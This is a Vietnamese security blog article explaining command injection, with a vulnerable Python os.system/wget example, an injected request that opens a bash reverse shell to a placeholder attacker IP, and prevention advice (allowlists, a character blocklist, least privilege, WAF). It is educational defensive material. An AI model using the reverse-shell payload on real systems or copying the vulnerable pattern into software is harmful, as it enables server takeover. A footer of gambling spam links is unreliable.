• Kiến thức
  • Network
  • Security
  • Software
  • Thủ thuật
  • Tin học văn phòng
  • Tin tức
  • Mail ảo tạm thời miễn phí
  • Tools tra cứu thông tin
  • Công cụ đổi số thành chữ
AnonyViet
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
AnonyViet
No Result
View All Result

Tìm hiểu về các cuộc tấn công Command Injection

Ellyx13 by Ellyx13
09/07/2022 - Updated on 24/07/2025
in Basic Hacking
A A
0

Mục lục bài viết

  1. Tìm hiểu về các cuộc tấn công Command Injection
  2. Ngăn chặn Command Injections
  3. Câu hỏi thường gặp
    1. Command Injection là gì và nó nguy hiểm như thế nào?
    2. Làm thế nào để ngăn chặn Command Injection?
    3. Nếu Command Injection xảy ra, tôi có thể làm gì để giảm thiểu thiệt hại?

Lỗ hổng thực thi mã từ xa (Remote code execution) là một loại lỗ hổng xảy ra khi những kẻ tấn công có thể thực thi mã của chúng trên máy của bạn. Một trong những cách phổ biến nhất có thể xảy ra là thông qua các lỗ hổng command injection (tiêm lệnh). Chúng là một kiểu thực thi mã từ xa xảy ra khi đầu vào của người dùng được nối trực tiếp vào một lệnh hệ thống.

📢 Tham gia kênh Telegram của AnonyViet
👉 Vào Telegram AnonyViet
Cập nhật bài mới, tools hay và thủ thuật IT nhanh nhất

Tìm hiểu về các cuộc tấn công Command Injection

Các bài viết liên quan

Cách khai thác lỗi Command Injection 2

Cách khai thác lỗi Command Injection

18/06/2022 - Updated on 24/07/2025

Tìm hiểu về các cuộc tấn công Command Injection

Bài trước mình đã hướng dẫn cách khai thác lỗi Command Injection. Bài này chúng ta sẽ tìm hiểu sâu hơn về lỗ hổng Command Injection.

Giả sử rằng trang web của bạn có chức năng cho phép người dùng tải xuống tệp từ xa và xem tệp đó trên trang web. Ứng dụng của bạn sẽ sử dụng lệnh hệ thống để tải xuống tệp từ xa.

Đây là mã nguồn python của chức năng đó. Hàm os.system() thực thi chuỗi đầu vào của nó dưới dạng lệnh hệ thống.

import os
def download(url):
  os.system(“wget -O- {}”.format(url))
display(download(user_input.url))

Wget là một công cụ tải file bằng cách cung cấp một URL và tùy chọn -O- cho phép Wget tải xuống tệp và hiển thị nó ở đầu ra tiêu chuẩn. Vì vậy, chương trình này lấy một URL từ đầu vào của người dùng và chuyển nó vào lệnh Wget được thực thi bằng cách sử dụng os.system(). Ví dụ: nếu bạn gửi yêu cầu này, ứng dụng sẽ tải xuống mã nguồn của trang chủ Google và hiển thị cho bạn.

GET /download?url=google.com
Host: example.com

Trong trường hợp này, lệnh hệ thống trở thành:

wget -O- google.com

Trong dòng lệnh của Linux, dấu chấm phẩy “;” có thể được sử dụng để tách các lệnh riêng lẻ. Kẻ tấn công có thể thực hiện các lệnh tùy ý sau lệnh Wget bằng cách gửi bất kỳ lệnh nào chúng muốn sau dấu chấm phẩy “;”. Đầu vào này sẽ khiến ứng dụng tạo ra một reverse shell kết nối với IP của kẻ tấn công trên cổng 8080.

GET /download?url=”google.com;bash -i >& /dev/tcp/attacker_ip/8080 0>&1"
Host: example.com

Trong trường hợp này, lệnh hệ thống trở thành:

wget -O- google.com;bash -i >& /dev/tcp/attacker_ip/8080 0>&1

Reverse shell làm cho máy chủ mục tiêu giao tiếp với máy của kẻ tấn công và thiết lập giao diện người dùng có thể truy cập từ xa cho phép kẻ tấn công thực hiện bất kỳ lệnh hệ thống nào.

Xem thêm:  Upload hình lên Website lạ không cần quyền Admin

Ngăn chặn Command Injections

Như bạn có thể thấy, việc tiêm lệnh (command injection) có thể giúp kẻ tấn công xâm nhập hoàn toàn ứng dụng của bạn và tài khoản người dùng đang chạy máy chủ web. Vậy làm cách nào để ngăn chặn những lỗ hổng nguy hiểm này?

Trước tiên, bạn có thể ngăn chặn việc tiêm lệnh (command injection) bằng cách không chạy lệnh hệ thống bằng đầu vào do người dùng cung cấp. Nếu bạn cần sử dụng đầu vào của người dùng trong lệnh hệ thống, hãy tránh gọi trực tiếp lệnh của hệ điều hành. Thay vào đó, bạn có thể thử sử dụng các hàm thư viện tích hợp sẵn phục vụ cùng một mục đích. Ví dụ: thay vì sử dụng os.system(“mkdir /dir_name”), bạn có thể sử dụng os.mkdir(“/dir_name”) trong thư viện OS của python. Và vì đầu vào của người dùng có thể được chuyển thành mã được ứng dụng phân tích cú pháp, bạn nên coi các tệp do người dùng tải lên là không đáng tin cậy và bảo vệ tính toàn vẹn của các tệp hệ thống được thực thi, phân tích cú pháp hoặc bao gồm bởi các chương trình.

Ngoài ra, bạn có thể triển khai xác thực đầu cho đầu vào được chuyển vào các lệnh. Cách tốt nhất để là thông qua một danh sách trắng. Bạn có thể đưa các chuỗi vào danh sách trắng hoặc các ký tự được phép trong danh sách trắng. Ví dụ: khi bạn muốn người dùng có thể thực hiện các lệnh tùy ý, bạn có thể đưa các lệnh vào danh sách trắng mà người dùng được phép chạy, chẳng hạn như ls và pwd, và chỉ cho phép các chuỗi đầu vào đó.

Xem thêm:  Cách quét lỗ hổng hệ thống bằng MITRE ATTCK

Khi bạn không thể làm được điều đó, bạn cũng có thể đưa các ký tự được phép vào danh sách trắng. Ví dụ: biểu thức chính quy này chỉ cho phép các chữ cái và số viết thường và không cho phép bất kỳ ký tự đặc biệt nào có thể được sử dụng để thao tác logic của lệnh. Độ dài của chuỗi đầu vào cũng đang được giới hạn ở 1–10 ký tự.

^[a-z0–9]{1,10}$

Cuối cùng, bạn cũng có thể loại các ký tự được chèn vào các lệnh hệ điều hành. Ví dụ: một số ký tự nguy hiểm cần được loại bỏ bao gồm:

& | ; $ > < ` \ !

Nhưng điều này thường kém hiệu quả hơn vì những kẻ tấn công liên tục nghĩ ra các phương pháp sáng tạo để vượt qua xác thực đầu vào dựa trên danh sách đen.

Nếu vẫn thất bại và kẻ tấn công thực hiện được việc tiêm lệnh vào máy của bạn, làm cách nào bạn có thể giảm thiểu tác hại mà chúng có thể gây ra? Chạy các lệnh tùy ý trên một hệ thống có nghĩa là có quyền truy cập gần như đầy đủ vào các quyền của ứng dụng đó. Vì vậy, nếu bạn giới hạn những gì ứng dụng của bạn có thể thực hiện trên hệ thống của mình, thì một lệnh tiêm đơn lẻ bằng ứng dụng đó sẽ không thể gây hại nghiêm trọng cho hệ thống của bạn.

“Nguyên tắc Đặc quyền Ít nhất” nói rằng các ứng dụng và quy trình chỉ nên được cấp các đặc quyền cần thiết để hoàn thành nhiệm vụ của chúng. Đó là phương pháp hay nhất giúp giảm nguy cơ xâm nhập hệ thống trong một cuộc tấn công vì những kẻ tấn công sẽ không có quyền truy cập vào các tệp và hoạt động nhạy cảm ngay cả khi chúng xâm nhập được người dùng hoặc quy trình có đặc quyền thấp. Ví dụ: khi một ứng dụng web chỉ yêu cầu quyền truy cập đọc vào một tệp, nó sẽ không được cấp bất kỳ quyền ghi hoặc thực thi nào. Bởi vì nếu kẻ tấn công chiếm quyền điều khiển một ứng dụng với đặc quyền cao, kẻ tấn công có thể giành được quyền của nó. Trong trường hợp này, bạn nên giới hạn đặc quyền của người dùng chạy máy chủ web để những kẻ tấn công không thể sử dụng nó để xâm nhập toàn bộ hệ thống.

Xem thêm:  Hack Windows từ xa qua Internet với Metasploit

Cuối cùng, bạn nên cập nhật các bản vá để ngăn dependencies của ứng dụng của bạn tạo ra các lỗ hổng chèn lệnh. Và bạn cũng có thể triển khai tường lửa ứng dụng web (WAF) để chặn các cuộc tấn công đáng ngờ.

Câu hỏi thường gặp

Command Injection là gì và nó nguy hiểm như thế nào?

Command Injection là một loại lỗ hổng bảo mật cho phép kẻ tấn công tiêm lệnh tùy ý vào ứng dụng, thường thông qua đầu vào người dùng. Điều này có thể cho phép kẻ tấn công thực thi mã độc hại trên máy chủ, gây ra thiệt hại nghiêm trọng như đánh cắp dữ liệu, kiểm soát hệ thống, hoặc làm gián đoạn dịch vụ.

Làm thế nào để ngăn chặn Command Injection?

Cách tốt nhất là tránh sử dụng trực tiếp đầu vào người dùng trong lệnh hệ thống. Thay vào đó, hãy sử dụng các hàm thư viện an toàn hơn, thực hiện xác thực đầu vào kỹ lưỡng (ví dụ: danh sách trắng), và áp dụng nguyên tắc đặc quyền tối thiểu cho các ứng dụng.

Nếu Command Injection xảy ra, tôi có thể làm gì để giảm thiểu thiệt hại?

Giảm thiểu thiệt hại bằng cách giới hạn quyền truy cập của ứng dụng. Áp dụng nguyên tắc đặc quyền tối thiểu, chỉ cấp cho ứng dụng các quyền cần thiết để hoạt động. Cập nhật phần mềm và sử dụng tường lửa ứng dụng web (WAF) cũng là những biện pháp hữu ích.

Tags: Command Injectiontiêm lệnh
Ellyx13

Ellyx13

DevOps với hơn 7 năm kinh nghiệm trong lĩnh vực hạ tầng, tự động hóa CI/CD và triển khai hệ thống phân tán trên các nền tảng như AWS, Azure và Kubernetes. - AWS Certified DevOps Engineer – Professional - Certified Kubernetes Administrator (CKA) - HashiCorp Certified: Terraform Associate - Docker Certified Associate (DCA) Có người không dám bước vì sợ gãy chân, nhưng sợ gãy chân mà không dám bước đi thì khác nào chân đã gãy.

Related Posts

Cách thực hiện kĩ thuật tấn công Shellcode Injection với Autoit 3
Basic Hacking

Cách thực hiện kĩ thuật tấn công Shellcode Injection với Autoit

08/03/2025 - Updated on 25/07/2025
Cách khai thác lỗ hổng DLL Hijacking trên Windows 4
Basic Hacking

Cách khai thác lỗ hổng DLL Hijacking trên Windows

05/03/2025 - Updated on 25/07/2025
Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus 5
Basic Hacking

Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus

10/02/2025 - Updated on 25/07/2025
Snov.io Email Finder: Tìm kiếm email chỉ với tên công ty/ tên miền/ hồ sơ LinkedIn 6
Basic Hacking

Snov.io Email Finder: Tìm kiếm email chỉ với tên công ty/ tên miền/ hồ sơ LinkedIn

14/12/2024 - Updated on 24/07/2025
Capsolver: Giải pháp tự động giải CAPTCHA dành cho doanh nghiệp 7
Basic Hacking

Capsolver: Giải pháp tự động giải CAPTCHA dành cho doanh nghiệp

12/12/2024 - Updated on 24/07/2025
Seekr: Thu thập & quản lý dữ liệu OSINT 8
Basic Hacking

Seekr: Thu thập & quản lý dữ liệu OSINT

22/11/2024 - Updated on 24/07/2025
guest

guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

0 Comments
oldest
newest
Inline Feedbacks
View all comments

Liên hệ Quảng Cáo

Lien he AnonyViet

Bài viết mới

Cách tạo chat nhóm trên ChatGPT để chia sẻ ý tưởng cùng đồng nghiệp 17

Cách tạo chat nhóm trên ChatGPT để chia sẻ ý tưởng cùng đồng nghiệp

by Thanh Kim
27/02/2026
0

Cách khóa máy tính bằng điện thoại Android từ xa 18

Cách khóa máy tính bằng điện thoại Android từ xa

by Thanh Kim
26/02/2026
0

cách kết nối điện thoại với TV Samsung

Cách kết nối điện thoại với TV Samsung không cần dây cáp

by Thanh Kim
25/02/2026
0

cách tạo video Seedance 2.0 miễn phí

Cách tạo video Seedance 2.0 miễn phí 12s, không logo

by Thanh Kim
24/02/2026
0

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên hệ

Email: support[@]anonyviet.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

 

DMCA.com Protection Status

Bình luận gần đây

  • 45555 trong Sự trỗi dậy của “Người ngoài hành tinh”: Alienware Aurora AC16250 “Vũ khí” tối thượng định hình Gaming năm 2026
  • 45555 trong Cách làm mờ ảnh trên iPhone sau khi chụp cực đơn giản
  • vatuan13 trong Hướng dẫn cài OpenClaw – AI Trợ lý cá nhân trên máy tính
  • vatuan13 trong Hướng dẫn thiết lập định vị giả trên Zalo
  • AnonyViet trong Hướng Dẫn Cấu Hình OpenClaw Trên VPS Ubuntu 2.5G RAM (giá chỉ 18$/năm)
  • hùng lê trong Hướng Dẫn Cấu Hình OpenClaw Trên VPS Ubuntu 2.5G RAM (giá chỉ 18$/năm)
  • Kelvin trong Hướng dẫn thi chứng chỉ bảo mật CTIGA miễn phí 100%
  • Minh trong Hướng dẫn kết nối OpenClaw với Whatsapp
  • AnonyViet trong Hướng Dẫn Cấu Hình OpenClaw Trên VPS Ubuntu 2.5G RAM (giá chỉ 18$/năm)
  • congdk trong Hướng Dẫn Cấu Hình OpenClaw Trên VPS Ubuntu 2.5G RAM (giá chỉ 18$/năm)
  • AnonyViet trong Hướng dẫn cài OpenClaw – AI Trợ lý cá nhân trên máy tính
  • AnonyViet trong Hướng dẫn cài OpenClaw – AI Trợ lý cá nhân trên máy tính
  • Tran Minh trong Hướng dẫn cài OpenClaw – AI Trợ lý cá nhân trên máy tính
  • AnonyViet trong Chia sẻ key SwifDoo PDF Pro miễn phí bản quyền lên đến 1 năm
  • Kerya Kuznetsov trong Chia sẻ key SwifDoo PDF Pro miễn phí bản quyền lên đến 1 năm
  • AnonyViet trong Chia sẻ key SwifDoo PDF Pro miễn phí bản quyền lên đến 1 năm
  • 1234560987 trong Chia sẻ key SwifDoo PDF Pro miễn phí bản quyền lên đến 1 năm
  • Lim trong Tổng hợp các Website tạo VISA ảo (virtual card) để mua hàng Online
  • Linh trong Cách dùng bot tự động verify để đăng ký ChatGPT K12, Spotify Student,…
  • Thịnh trong Tải và kích hoạt Office 2021 Free với tool OfficeSavior
kết quả xổ số hôm nay 33win Ae888 kubet kubet 8kbet 99ok xin88 good88 kubet fm88 kubet thailand vip66 xoso66 https://tp88fun.com/ hello88 qq88 Xoso66 Vip66 hitclub bong99 XOSO66 new882.info Thabet fun88 nhà cái uy tín sunwin sunwin rikvip hitclub sunwin go88 12bet v9bet betvisa betvisa vin777 vin777 ee88 bet88 abc8 c54 https://keonhacai.fund/ sunwin cakhiatv socolive Xoso66 zx88 88vv fun88.supply EE88 FB88 https://da88.design/ https://fun88.supply/ F8BET80 https://q23win.com/ 32win https://lc88.jpn.com/ u888 8xbet W88 link 58win 58WIN ax88 https://bbet88b.com/ OK9 SHBET https://xx88.center/ vswin 789PCOM NHÀ CÁI MMOO TT88COM GO 99 RR88 ABC8 https://nowgoal.ws/ https://tylekeonhacai.me/ https://keonhacai.org.vc/ https://xx88.ac/ xx88.me.uk XN88 NOHU90 68WIN GO99 AF88 HM88 HZ88 https://xx88.asia/ 789f NOHU HITCLUB Sunwin 58WIN MV88 888NEW AZ888 PG99 TD88 12bet v9bet X88 NOHU90 Thabet vip66 7mcn hm88 SODO Casino xoso66 DA88 9BET https://daga.rocks https://c168.info/ LC88 Game SH BET WIN678 tài xỉu online uy tín sv368 X88 KÈO NHÀ CÁI 888slot luongsontv cola tv colatv trực tiếp bóng đá colatv trực tiếp bóng đá colatv colatv truc tiep bong da colatv colatv bóng đá trực tiếp xoilac cakhia SH BET https://jun88sr.com/ GVUI TR88 NOHU90 TG88 188BET 188BET Link Rik88 https://qq88pro.vip/ https://kjcgaming.com GO99 https://nohutm.com 6789 789Win 12bet https://tiendanutrisalud.com/ https://go8.red/ lc88 cm88 Game bài đổi thưởng uy tín 23win clubv 7m https://urr88.com/ b52club tỷ lệ nhà cái game nổ hũ https://f8bet.luxury/ https://kjcgaming.com/ https://888newcasino.com/ Kết quả bóng đá v9bet game bài đổi thưởng SODO Mig8 sv388 vsbet mcw casino game bài 68win link hit club game bai tg88 kèo nhà cái 5 9 win Exness ログイン Sunwin UU88 VIN777 HUBET nổ hũ uy tín Go88 https://bancadoithuong.codes/ https://danhdeonline.blog/ Xocdia88 https://nhacaiuytin10.uk.com/ https://keonhacai88.tv/ https://keonhacai.loans/ https://gamebaidoithuong.io/ https://keonhacai.kiwi/ 789club 8kbet sodo casino F168 ok 8386 nk88 Tr88 https://jun88pl.com/ kèo nhà cái S8 xx88 V9BET hytw3339 tài xỉu Sun52 king52 x88 https://918xxy.com/ Luckywin https://sc88.info/ https://go99bet.live/ https://tt88.ae.org/ kjc https://socolive.stream/ F168 Nhà cái 789BET https://devmarks.io SC88 https://lc88.bio/ F168 8us https://www.open8808.com/ c168 fly88 trang chủ sc88 hytw3339 ok9 Kkwin https://go99.mx/ f168 79king Sunwin nhà cái MB66 Luck8 Alo789 hello88 f168 mb66 MV88 sc88 11uu vn23 8DAY ko66 789win 88CLB kèo nhà cái TẢI SUNWIN Thabet tg88 c168 CM88 nạp tiền qq88 8kbet Lode88 game bài game nổ hũ tỷ lệ nhà cái sun win gavangtv colatv truc tiep bong da trực tiếp bóng rổ thapcamtv

©2026 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về CNTT

No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC

©2026 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về CNTT

wpDiscuz